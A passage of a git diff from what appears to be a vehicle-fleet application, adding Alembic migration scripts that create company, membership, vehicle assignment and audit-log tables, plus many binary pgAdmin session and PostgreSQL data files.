diff --git a/migrations/versions/8d450e9dc77f_add_vehicle_staging.py b/migrations/versions/8d450e9dc77f_add_vehicle_staging.py new file mode 100755 index 0000000..3ddd055 --- /dev/null +++ b/migrations/versions/8d450e9dc77f_add_vehicle_staging.py @@ -0,0 +1,35 @@ +"""add_vehicle_staging + +Revision ID: 8d450e9dc77f +Revises: 553ef1388276 +Create Date: 2026-01-25 12:08:48.056502 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision: str = '8d450e9dc77f' +down_revision: Union[str, Sequence[str], None] = '553ef1388276' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Upgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + # op.drop_table('alembic_version') + # ### end Alembic commands ### + + +def downgrade() -> None: + """Downgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('alembic_version', + sa.Column('version_num', sa.VARCHAR(length=32), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('version_num', name='alembic_version_pkc') + ) + # ### end Alembic commands ### diff --git a/migrations/versions/__pycache__/10b73fee8967_fix_roles_and_universal_vehicles.cpython-312.pyc b/migrations/versions/__pycache__/10b73fee8967_fix_roles_and_universal_vehicles.cpython-312.pyc new file mode 100755 index 0000000..73d9b2b Binary files /dev/null and b/migrations/versions/__pycache__/10b73fee8967_fix_roles_and_universal_vehicles.cpython-312.pyc differ diff --git a/migrations/versions/__pycache__/13bd03551ebf_add_verification_tokens_and_legal_tables.cpython-312.pyc b/migrations/versions/__pycache__/13bd03551ebf_add_verification_tokens_and_legal_tables.cpython-312.pyc new file mode 100755 index 0000000..14002f6 Binary files /dev/null and b/migrations/versions/__pycache__/13bd03551ebf_add_verification_tokens_and_legal_tables.cpython-312.pyc differ diff --git a/migrations/versions/__pycache__/13d050e8cf6d_initial_baseline_v2.cpython-312.pyc b/migrations/versions/__pycache__/13d050e8cf6d_initial_baseline_v2.cpython-312.pyc new file mode 100755 index 0000000..215700c Binary files /dev/null and b/migrations/versions/__pycache__/13d050e8cf6d_initial_baseline_v2.cpython-312.pyc differ diff --git a/migrations/versions/__pycache__/553ef1388276_rebuild_schema_v2.cpython-312.pyc b/migrations/versions/__pycache__/553ef1388276_rebuild_schema_v2.cpython-312.pyc new file mode 100755 index 0000000..c49d61e Binary files /dev/null and b/migrations/versions/__pycache__/553ef1388276_rebuild_schema_v2.cpython-312.pyc differ diff --git a/migrations/versions/__pycache__/5aed26900f0b_add_persons_and_owner_person_id.cpython-312.pyc b/migrations/versions/__pycache__/5aed26900f0b_add_persons_and_owner_person_id.cpython-312.pyc new file mode 100755 index 0000000..502ae1b Binary files /dev/null and b/migrations/versions/__pycache__/5aed26900f0b_add_persons_and_owner_person_id.cpython-312.pyc differ diff --git a/migrations/versions/__pycache__/8d450e9dc77f_add_vehicle_staging.cpython-312.pyc b/migrations/versions/__pycache__/8d450e9dc77f_add_vehicle_staging.cpython-312.pyc new file mode 100755 index 0000000..aa3516e Binary files /dev/null and b/migrations/versions/__pycache__/8d450e9dc77f_add_vehicle_staging.cpython-312.pyc differ diff --git a/migrations/versions/__pycache__/c21c2c7e70d4_clean_gamification_setup.cpython-312.pyc b/migrations/versions/__pycache__/c21c2c7e70d4_clean_gamification_setup.cpython-312.pyc new file mode 100755 index 0000000..686d445 Binary files /dev/null and b/migrations/versions/__pycache__/c21c2c7e70d4_clean_gamification_setup.cpython-312.pyc differ diff --git a/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py b/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py new file mode 100755 index 0000000..82ee655 --- /dev/null +++ b/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py @@ -0,0 +1,152 @@ +"""Clean gamification setup + +Revision ID: c21c2c7e70d4 +Revises: +Create Date: 2026-01-24 11:19:10.464212 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision: str = 'c21c2c7e70d4' +down_revision: Union[str, Sequence[str], None] = None +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Upgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('audit_logs', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('target_type', sa.String(), nullable=True), + sa.Column('target_id', sa.Integer(), nullable=True), + sa.Column('action', sa.String(), nullable=False), + sa.Column('changes', sa.JSON(), nullable=True), + sa.Column('ip_address', sa.String(), nullable=True), + sa.Column('user_agent', sa.String(), nullable=True), + sa.Column('timestamp', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_audit_logs_id'), 'audit_logs', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_audit_logs_target_id'), 'audit_logs', ['target_id'], unique=False, schema='data') + op.create_index(op.f('ix_data_audit_logs_target_type'), 'audit_logs', ['target_type'], unique=False, schema='data') + op.create_table('companies', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('name', sa.String(), nullable=False), + sa.Column('tax_number', sa.String(), nullable=True), + sa.Column('subscription_tier', sa.String(), nullable=True), + sa.Column('owner_id', sa.Integer(), nullable=False), + sa.ForeignKeyConstraint(['owner_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_companies_id'), 'companies', ['id'], unique=False, schema='data') + op.create_table('company_members', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('company_id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=False), + sa.Column('role', sa.Enum('OWNER', 'MANAGER', 'DRIVER', name='companyrole'), nullable=False), + sa.Column('can_edit_service', sa.Boolean(), nullable=True), + sa.Column('can_see_costs', sa.Boolean(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.ForeignKeyConstraint(['company_id'], ['data.companies.id'], ), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_company_members_id'), 'company_members', ['id'], unique=False, schema='data') + op.create_table('vehicle_assignments', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('company_id', sa.Integer(), nullable=False), + sa.Column('vehicle_id', sa.Integer(), nullable=False), + sa.Column('driver_id', sa.Integer(), nullable=False), + sa.Column('start_date', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.Column('end_date', sa.DateTime(timezone=True), nullable=True), + sa.Column('start_odometer', sa.Integer(), nullable=True), + sa.Column('end_odometer', sa.Integer(), nullable=True), + sa.Column('notes', sa.String(), nullable=True), + sa.ForeignKeyConstraint(['company_id'], ['data.companies.id'], ), + sa.ForeignKeyConstraint(['driver_id'], ['data.users.id'], ), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_assignments_id'), 'vehicle_assignments', ['id'], unique=False, schema='data') + op.create_table('vehicle_ownerships', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('vehicle_id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=False), + sa.Column('start_date', sa.Date(), nullable=False), + sa.Column('end_date', sa.Date(), nullable=True), + sa.Column('notes', sa.Text(), nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_ownerships_id'), 'vehicle_ownerships', ['id'], unique=False, schema='data') + # op.drop_table('costs', schema='data') + # op.drop_table('alembic_version') + # op.drop_table('vehicle_history', schema='data') + # ### end Alembic commands ### + + +def downgrade() -> None: + """Downgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('vehicle_history', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('role', sa.VARCHAR(length=20), autoincrement=False, nullable=False), + sa.Column('start_date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('end_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('start_mileage', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('end_mileage', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('is_active', sa.BOOLEAN(), sa.Computed('(end_date IS NULL)', persisted=True), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('vehicle_history_user_id_fkey')), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], name=op.f('vehicle_history_vehicle_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_history_pkey')), + schema='data' + ) + op.create_table('alembic_version', + sa.Column('version_num', sa.VARCHAR(length=32), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('version_num', name=op.f('alembic_version_pkc')) + ) + op.create_table('costs', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('cost_type', sa.VARCHAR(length=50), autoincrement=False, nullable=False), + sa.Column('amount', sa.NUMERIC(precision=10, scale=2), autoincrement=False, nullable=False), + sa.Column('date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('mileage_at_cost', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True), + sa.Column('document_url', sa.VARCHAR(length=255), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('costs_user_id_fkey')), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], name=op.f('costs_vehicle_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('costs_pkey')), + schema='data' + ) + op.drop_index(op.f('ix_data_vehicle_ownerships_id'), table_name='vehicle_ownerships', schema='data') + op.drop_table('vehicle_ownerships', schema='data') + op.drop_index(op.f('ix_data_vehicle_assignments_id'), table_name='vehicle_assignments', schema='data') + op.drop_table('vehicle_assignments', schema='data') + op.drop_index(op.f('ix_data_company_members_id'), table_name='company_members', schema='data') + op.drop_table('company_members', schema='data') + op.drop_index(op.f('ix_data_companies_id'), table_name='companies', schema='data') + op.drop_table('companies', schema='data') + op.drop_index(op.f('ix_data_audit_logs_target_type'), table_name='audit_logs', schema='data') + op.drop_index(op.f('ix_data_audit_logs_target_id'), table_name='audit_logs', schema='data') + op.drop_index(op.f('ix_data_audit_logs_id'), table_name='audit_logs', schema='data') + op.drop_table('audit_logs', schema='data') + # ### end Alembic commands ### diff --git a/pgadmin_data/sessions/159f1157-2d9c-482f-96f2-92bb36a5cf6b b/pgadmin_data/sessions/159f1157-2d9c-482f-96f2-92bb36a5cf6b new file mode 100755 index 0000000..9553b8c Binary files /dev/null and b/pgadmin_data/sessions/159f1157-2d9c-482f-96f2-92bb36a5cf6b differ diff --git a/pgadmin_data/sessions/1b243d10-470d-4d87-b602-e55a413b3cea b/pgadmin_data/sessions/1b243d10-470d-4d87-b602-e55a413b3cea new file mode 100755 index 0000000..e690122 Binary files /dev/null and b/pgadmin_data/sessions/1b243d10-470d-4d87-b602-e55a413b3cea differ diff --git a/pgadmin_data/sessions/210fc1f6-f42c-42af-93c9-e5f42e49a852 b/pgadmin_data/sessions/210fc1f6-f42c-42af-93c9-e5f42e49a852 new file mode 100755 index 0000000..bac44f4 Binary files /dev/null and b/pgadmin_data/sessions/210fc1f6-f42c-42af-93c9-e5f42e49a852 differ diff --git a/pgadmin_data/sessions/5df8b875-e2e7-4614-9046-cb329aa83169 b/pgadmin_data/sessions/5df8b875-e2e7-4614-9046-cb329aa83169 new file mode 100755 index 0000000..834f617 Binary files /dev/null and b/pgadmin_data/sessions/5df8b875-e2e7-4614-9046-cb329aa83169 differ diff --git a/pgadmin_data/sessions/9cf7ead4-70bf-4788-992d-87e1969539af b/pgadmin_data/sessions/9cf7ead4-70bf-4788-992d-87e1969539af new file mode 100755 index 0000000..b42864a Binary files /dev/null and b/pgadmin_data/sessions/9cf7ead4-70bf-4788-992d-87e1969539af differ diff --git a/pgadmin_data/sessions/d3893232-05b2-4bff-9a92-4a7a0d394a8a b/pgadmin_data/sessions/d3893232-05b2-4bff-9a92-4a7a0d394a8a new file mode 100755 index 0000000..a96b300 Binary files /dev/null and b/pgadmin_data/sessions/d3893232-05b2-4bff-9a92-4a7a0d394a8a differ diff --git a/pgadmin_data/sessions/f3274d22-c918-4c15-9235-38f09a0984e9 b/pgadmin_data/sessions/f3274d22-c918-4c15-9235-38f09a0984e9 new file mode 100755 index 0000000..a8a5c16 Binary files /dev/null and b/pgadmin_data/sessions/f3274d22-c918-4c15-9235-38f09a0984e9 differ diff --git a/pgadmin_data/sessions/f71a6056-cca2-410e-a5df-5b625adb6e3c b/pgadmin_data/sessions/f71a6056-cca2-410e-a5df-5b625adb6e3c new file mode 100755 index 0000000..fa8508f Binary files /dev/null and b/pgadmin_data/sessions/f71a6056-cca2-410e-a5df-5b625adb6e3c differ diff --git a/postgres/data/PG_VERSION b/postgres/data/PG_VERSION new file mode 100755 index 0000000..98d9bcb --- /dev/null +++ b/postgres/data/PG_VERSION @@ -0,0 +1 @@ +17 diff --git a/postgres/data/base/1/112 b/postgres/data/base/1/112 new file mode 100755 index 0000000..9531ca8 Binary files /dev/null and b/postgres/data/base/1/112 differ diff --git a/postgres/data/base/1/113 b/postgres/data/base/1/113 new file mode 100755 index 0000000..f92630d Binary files /dev/null and b/postgres/data/base/1/113 differ diff --git a/postgres/data/base/1/1247 b/postgres/data/base/1/1247 new file mode 100755 index 0000000..540213e Binary files /dev/null and b/postgres/data/base/1/1247 differ diff --git a/postgres/data/base/1/1247_fsm b/postgres/data/base/1/1247_fsm new file mode 100755 index 0000000..fd57308 Binary files /dev/null and b/postgres/data/base/1/1247_fsm differ diff --git a/postgres/data/base/1/1247_vm b/postgres/data/base/1/1247_vm new file mode 100755 index 0000000..8ccc3c7 Binary files /dev/null and b/postgres/data/base/1/1247_vm differ diff --git a/postgres/data/base/1/1249 b/postgres/data/base/1/1249 new file mode 100755 index 0000000..9b8eeab Binary files /dev/null and b/postgres/data/base/1/1249 differ diff --git a/postgres/data/base/1/1249_fsm b/postgres/data/base/1/1249_fsm new file mode 100755 index 0000000..e0ed4b0 Binary files /dev/null and b/postgres/data/base/1/1249_fsm differ diff --git a/postgres/data/base/1/1249_vm b/postgres/data/base/1/1249_vm new file mode 100755 index 0000000..affcf7f Binary files /dev/null and b/postgres/data/base/1/1249_vm differ diff --git a/postgres/data/base/1/1255 b/postgres/data/base/1/1255 new file mode 100755 index 0000000..23ff105 Binary files /dev/null and b/postgres/data/base/1/1255 differ diff --git a/postgres/data/base/1/1255_fsm b/postgres/data/base/1/1255_fsm new file mode 100755 index 0000000..062bfc5 Binary files /dev/null and b/postgres/data/base/1/1255_fsm differ diff --git a/postgres/data/base/1/1255_vm b/postgres/data/base/1/1255_vm new file mode 100755 index 0000000..7ac0ecc Binary files /dev/null and b/postgres/data/base/1/1255_vm differ diff --git a/postgres/data/base/1/1259 b/postgres/data/base/1/1259 new file mode 100755 index 0000000..8b483b3 Binary files /dev/null and b/postgres/data/base/1/1259 differ diff --git a/postgres/data/base/1/1259_fsm b/postgres/data/base/1/1259_fsm new file mode 100755 index 0000000..2077a7b Binary files /dev/null and b/postgres/data/base/1/1259_fsm differ diff --git a/postgres/data/base/1/1259_vm b/postgres/data/base/1/1259_vm new file mode 100755 index 0000000..c44f30c Binary files /dev/null and b/postgres/data/base/1/1259_vm differ diff --git a/postgres/data/base/1/13463 b/postgres/data/base/1/13463 new file mode 100755 index 0000000..5ac7a42 Binary files /dev/null and b/postgres/data/base/1/13463 differ diff --git a/postgres/data/base/1/13463_fsm b/postgres/data/base/1/13463_fsm new file mode 100755 index 0000000..45338f1 Binary files /dev/null and b/postgres/data/base/1/13463_fsm differ diff --git a/postgres/data/base/1/13463_vm b/postgres/data/base/1/13463_vm new file mode 100755 index 0000000..dd38365 Binary files /dev/null and b/postgres/data/base/1/13463_vm differ diff --git a/postgres/data/base/1/13466 b/postgres/data/base/1/13466 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/13467 b/postgres/data/base/1/13467 new file mode 100755 index 0000000..f572c60 Binary files /dev/null and b/postgres/data/base/1/13467 differ diff --git a/postgres/data/base/1/13468 b/postgres/data/base/1/13468 new file mode 100755 index 0000000..1c39b02 Binary files /dev/null and b/postgres/data/base/1/13468 differ diff --git a/postgres/data/base/1/13468_fsm b/postgres/data/base/1/13468_fsm new file mode 100755 index 0000000..70d16ce Binary files /dev/null and b/postgres/data/base/1/13468_fsm differ diff --git a/postgres/data/base/1/13468_vm b/postgres/data/base/1/13468_vm new file mode 100755 index 0000000..a990030 Binary files /dev/null and b/postgres/data/base/1/13468_vm differ diff --git a/postgres/data/base/1/13471 b/postgres/data/base/1/13471 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/13472 b/postgres/data/base/1/13472 new file mode 100755 index 0000000..c1b4577 Binary files /dev/null and b/postgres/data/base/1/13472 differ diff --git a/postgres/data/base/1/13473 b/postgres/data/base/1/13473 new file mode 100755 index 0000000..7722593 Binary files /dev/null and b/postgres/data/base/1/13473 differ diff --git a/postgres/data/base/1/13473_fsm b/postgres/data/base/1/13473_fsm new file mode 100755 index 0000000..0673ada Binary files /dev/null and b/postgres/data/base/1/13473_fsm differ diff --git a/postgres/data/base/1/13473_vm b/postgres/data/base/1/13473_vm new file mode 100755 index 0000000..076d693 Binary files /dev/null and b/postgres/data/base/1/13473_vm differ diff --git a/postgres/data/base/1/13476 b/postgres/data/base/1/13476 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/13477 b/postgres/data/base/1/13477 new file mode 100755 index 0000000..a2b6d05 Binary files /dev/null and b/postgres/data/base/1/13477 differ diff --git a/postgres/data/base/1/13478 b/postgres/data/base/1/13478 new file mode 100755 index 0000000..fe52a6c Binary files /dev/null and b/postgres/data/base/1/13478 differ diff --git a/postgres/data/base/1/13478_fsm b/postgres/data/base/1/13478_fsm new file mode 100755 index 0000000..a836ddf Binary files /dev/null and b/postgres/data/base/1/13478_fsm differ diff --git a/postgres/data/base/1/13478_vm b/postgres/data/base/1/13478_vm new file mode 100755 index 0000000..a69a78d Binary files /dev/null and b/postgres/data/base/1/13478_vm differ diff --git a/postgres/data/base/1/13481 b/postgres/data/base/1/13481 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/13482 b/postgres/data/base/1/13482 new file mode 100755 index 0000000..fbe1432 Binary files /dev/null and b/postgres/data/base/1/13482 differ diff --git a/postgres/data/base/1/1417 b/postgres/data/base/1/1417 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/1418 b/postgres/data/base/1/1418 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/174 b/postgres/data/base/1/174 new file mode 100755 index 0000000..4f4d8be Binary files /dev/null and b/postgres/data/base/1/174 differ diff --git a/postgres/data/base/1/175 b/postgres/data/base/1/175 new file mode 100755 index 0000000..98fd8de Binary files /dev/null and b/postgres/data/base/1/175 differ diff --git a/postgres/data/base/1/2187 b/postgres/data/base/1/2187 new file mode 100755 index 0000000..d2cd30b Binary files /dev/null and b/postgres/data/base/1/2187 differ diff --git a/postgres/data/base/1/2224 b/postgres/data/base/1/2224 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2228 b/postgres/data/base/1/2228 new file mode 100755 index 0000000..bfecf01 Binary files /dev/null and b/postgres/data/base/1/2228 differ diff --git a/postgres/data/base/1/2328 b/postgres/data/base/1/2328 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2336 b/postgres/data/base/1/2336 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2337 b/postgres/data/base/1/2337 new file mode 100755 index 0000000..2c0b13d Binary files /dev/null and b/postgres/data/base/1/2337 differ diff --git a/postgres/data/base/1/2579 b/postgres/data/base/1/2579 new file mode 100755 index 0000000..e8e73a2 Binary files /dev/null and b/postgres/data/base/1/2579 differ diff --git a/postgres/data/base/1/2600 b/postgres/data/base/1/2600 new file mode 100755 index 0000000..9dfd1a8 Binary files /dev/null and b/postgres/data/base/1/2600 differ diff --git a/postgres/data/base/1/2600_fsm b/postgres/data/base/1/2600_fsm new file mode 100755 index 0000000..c542a78 Binary files /dev/null and b/postgres/data/base/1/2600_fsm differ diff --git a/postgres/data/base/1/2600_vm b/postgres/data/base/1/2600_vm new file mode 100755 index 0000000..c298c06 Binary files /dev/null and b/postgres/data/base/1/2600_vm differ diff --git a/postgres/data/base/1/2601 b/postgres/data/base/1/2601 new file mode 100755 index 0000000..d8001c8 Binary files /dev/null and b/postgres/data/base/1/2601 differ diff --git a/postgres/data/base/1/2601_fsm b/postgres/data/base/1/2601_fsm new file mode 100755 index 0000000..d388044 Binary files /dev/null and b/postgres/data/base/1/2601_fsm differ diff --git a/postgres/data/base/1/2601_vm b/postgres/data/base/1/2601_vm new file mode 100755 index 0000000..ce3bf93 Binary files /dev/null and b/postgres/data/base/1/2601_vm differ diff --git a/postgres/data/base/1/2602 b/postgres/data/base/1/2602 new file mode 100755 index 0000000..4a27b0a Binary files /dev/null and b/postgres/data/base/1/2602 differ diff --git a/postgres/data/base/1/2602_fsm b/postgres/data/base/1/2602_fsm new file mode 100755 index 0000000..23170d8 Binary files /dev/null and b/postgres/data/base/1/2602_fsm differ diff --git a/postgres/data/base/1/2602_vm b/postgres/data/base/1/2602_vm new file mode 100755 index 0000000..3b5e257 Binary files /dev/null and b/postgres/data/base/1/2602_vm differ diff --git a/postgres/data/base/1/2603 b/postgres/data/base/1/2603 new file mode 100755 index 0000000..d511af5 Binary files /dev/null and b/postgres/data/base/1/2603 differ diff --git a/postgres/data/base/1/2603_fsm b/postgres/data/base/1/2603_fsm new file mode 100755 index 0000000..949bd18 Binary files /dev/null and b/postgres/data/base/1/2603_fsm differ diff --git a/postgres/data/base/1/2603_vm b/postgres/data/base/1/2603_vm new file mode 100755 index 0000000..7df4f59 Binary files /dev/null and b/postgres/data/base/1/2603_vm differ diff --git a/postgres/data/base/1/2604 b/postgres/data/base/1/2604 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2605 b/postgres/data/base/1/2605 new file mode 100755 index 0000000..eeaa7ea Binary files /dev/null and b/postgres/data/base/1/2605 differ diff --git a/postgres/data/base/1/2605_fsm b/postgres/data/base/1/2605_fsm new file mode 100755 index 0000000..f3b92bf Binary files /dev/null and b/postgres/data/base/1/2605_fsm differ diff --git a/postgres/data/base/1/2605_vm b/postgres/data/base/1/2605_vm new file mode 100755 index 0000000..a95fe7b Binary files /dev/null and b/postgres/data/base/1/2605_vm differ diff --git a/postgres/data/base/1/2606 b/postgres/data/base/1/2606 new file mode 100755 index 0000000..0e4c5a3 Binary files /dev/null and b/postgres/data/base/1/2606 differ diff --git a/postgres/data/base/1/2606_fsm b/postgres/data/base/1/2606_fsm new file mode 100755 index 0000000..267454e Binary files /dev/null and b/postgres/data/base/1/2606_fsm differ diff --git a/postgres/data/base/1/2606_vm b/postgres/data/base/1/2606_vm new file mode 100755 index 0000000..6b0159f Binary files /dev/null and b/postgres/data/base/1/2606_vm differ diff --git a/postgres/data/base/1/2607 b/postgres/data/base/1/2607 new file mode 100755 index 0000000..bfad49a Binary files /dev/null and b/postgres/data/base/1/2607 differ diff --git a/postgres/data/base/1/2607_fsm b/postgres/data/base/1/2607_fsm new file mode 100755 index 0000000..80ac8b1 Binary files /dev/null and b/postgres/data/base/1/2607_fsm differ diff --git a/postgres/data/base/1/2607_vm b/postgres/data/base/1/2607_vm new file mode 100755 index 0000000..7c2c53d Binary files /dev/null and b/postgres/data/base/1/2607_vm differ diff --git a/postgres/data/base/1/2608 b/postgres/data/base/1/2608 new file mode 100755 index 0000000..7f6f529 Binary files /dev/null and b/postgres/data/base/1/2608 differ diff --git a/postgres/data/base/1/2608_fsm b/postgres/data/base/1/2608_fsm new file mode 100755 index 0000000..4b19785 Binary files /dev/null and b/postgres/data/base/1/2608_fsm differ diff --git a/postgres/data/base/1/2608_vm b/postgres/data/base/1/2608_vm new file mode 100755 index 0000000..6e5e572 Binary files /dev/null and b/postgres/data/base/1/2608_vm differ diff --git a/postgres/data/base/1/2609 b/postgres/data/base/1/2609 new file mode 100755 index 0000000..f22fe32 Binary files /dev/null and b/postgres/data/base/1/2609 differ diff --git a/postgres/data/base/1/2609_fsm b/postgres/data/base/1/2609_fsm new file mode 100755 index 0000000..7be5dc7 Binary files /dev/null and b/postgres/data/base/1/2609_fsm differ diff --git a/postgres/data/base/1/2609_vm b/postgres/data/base/1/2609_vm new file mode 100755 index 0000000..40974d4 Binary files /dev/null and b/postgres/data/base/1/2609_vm differ diff --git a/postgres/data/base/1/2610 b/postgres/data/base/1/2610 new file mode 100755 index 0000000..2b6e6ed Binary files /dev/null and b/postgres/data/base/1/2610 differ diff --git a/postgres/data/base/1/2610_fsm b/postgres/data/base/1/2610_fsm new file mode 100755 index 0000000..ecbcb5f Binary files /dev/null and b/postgres/data/base/1/2610_fsm differ diff --git a/postgres/data/base/1/2610_vm b/postgres/data/base/1/2610_vm new file mode 100755 index 0000000..6a8139e Binary files /dev/null and b/postgres/data/base/1/2610_vm differ diff --git a/postgres/data/base/1/2611 b/postgres/data/base/1/2611 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2612 b/postgres/data/base/1/2612 new file mode 100755 index 0000000..024d951 Binary files /dev/null and b/postgres/data/base/1/2612 differ diff --git a/postgres/data/base/1/2612_fsm b/postgres/data/base/1/2612_fsm new file mode 100755 index 0000000..877976a Binary files /dev/null and b/postgres/data/base/1/2612_fsm differ diff --git a/postgres/data/base/1/2612_vm b/postgres/data/base/1/2612_vm new file mode 100755 index 0000000..66d693c Binary files /dev/null and b/postgres/data/base/1/2612_vm differ diff --git a/postgres/data/base/1/2613 b/postgres/data/base/1/2613 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2615 b/postgres/data/base/1/2615 new file mode 100755 index 0000000..add2690 Binary files /dev/null and b/postgres/data/base/1/2615 differ diff --git a/postgres/data/base/1/2615_fsm b/postgres/data/base/1/2615_fsm new file mode 100755 index 0000000..d041693 Binary files /dev/null and b/postgres/data/base/1/2615_fsm differ diff --git a/postgres/data/base/1/2615_vm b/postgres/data/base/1/2615_vm new file mode 100755 index 0000000..5ca7f9c Binary files /dev/null and b/postgres/data/base/1/2615_vm differ diff --git a/postgres/data/base/1/2616 b/postgres/data/base/1/2616 new file mode 100755 index 0000000..0d60d79 Binary files /dev/null and b/postgres/data/base/1/2616 differ diff --git a/postgres/data/base/1/2616_fsm b/postgres/data/base/1/2616_fsm new file mode 100755 index 0000000..cb924c9 Binary files /dev/null and b/postgres/data/base/1/2616_fsm differ diff --git a/postgres/data/base/1/2616_vm b/postgres/data/base/1/2616_vm new file mode 100755 index 0000000..67dd5a6 Binary files /dev/null and b/postgres/data/base/1/2616_vm differ diff --git a/postgres/data/base/1/2617 b/postgres/data/base/1/2617 new file mode 100755 index 0000000..bcdfc18 Binary files /dev/null and b/postgres/data/base/1/2617 differ diff --git a/postgres/data/base/1/2617_fsm b/postgres/data/base/1/2617_fsm new file mode 100755 index 0000000..29d6066 Binary files /dev/null and b/postgres/data/base/1/2617_fsm differ diff --git a/postgres/data/base/1/2617_vm b/postgres/data/base/1/2617_vm new file mode 100755 index 0000000..5b871b4 Binary files /dev/null and b/postgres/data/base/1/2617_vm differ diff --git a/postgres/data/base/1/2618 b/postgres/data/base/1/2618 new file mode 100755 index 0000000..a413ce8 Binary files /dev/null and b/postgres/data/base/1/2618 differ diff --git a/postgres/data/base/1/2618_fsm b/postgres/data/base/1/2618_fsm new file mode 100755 index 0000000..6cf107f Binary files /dev/null and b/postgres/data/base/1/2618_fsm differ diff --git a/postgres/data/base/1/2618_vm b/postgres/data/base/1/2618_vm new file mode 100755 index 0000000..598a6a2 Binary files /dev/null and b/postgres/data/base/1/2618_vm differ diff --git a/postgres/data/base/1/2619 b/postgres/data/base/1/2619 new file mode 100755 index 0000000..5b7521a Binary files /dev/null and b/postgres/data/base/1/2619 differ diff --git a/postgres/data/base/1/2619_fsm b/postgres/data/base/1/2619_fsm new file mode 100755 index 0000000..7eaf8a8 Binary files /dev/null and b/postgres/data/base/1/2619_fsm differ diff --git a/postgres/data/base/1/2619_vm b/postgres/data/base/1/2619_vm new file mode 100755 index 0000000..f63aa88 Binary files /dev/null and b/postgres/data/base/1/2619_vm differ diff --git a/postgres/data/base/1/2620 b/postgres/data/base/1/2620 new file mode 100755 index 0000000..e69de29 diff --git a/postgres/data/base/1/2650 b/postgres/data/base/1/2650 new file mode 100755 index 0000000..042d761 Binary files /dev/null and b/postgres/data/base/1/2650 differ diff --git a/postgres/data/base/1/2651 b/postgres/data/base/1/2651 new file mode 100755 index 0000000..35590f4 Binary files /dev/null and b/postgres/data/base/1/2651 differ diff --git 